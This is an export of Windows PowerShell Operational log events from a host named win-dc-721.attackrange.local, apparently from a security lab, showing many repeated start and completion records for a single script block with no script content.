LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470896
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470895
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470894
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470893
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470892
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470891
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470890
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470889
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470888
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470887
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470886
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470885
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470884
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470883
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470882
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470881
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470880
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470879
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470878
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470877
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470876
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470875
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470874
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470873
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470872
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470871
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470870
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470869
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470868
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470867
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470866
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470865
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470864
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470863
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470862
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470861
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470860
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470859
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470858
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470857
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470856
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470855
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470854
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470853
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470852
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470851
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470850
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470849
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470848
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470847
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470846
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470845
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470844
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470843
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470842
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
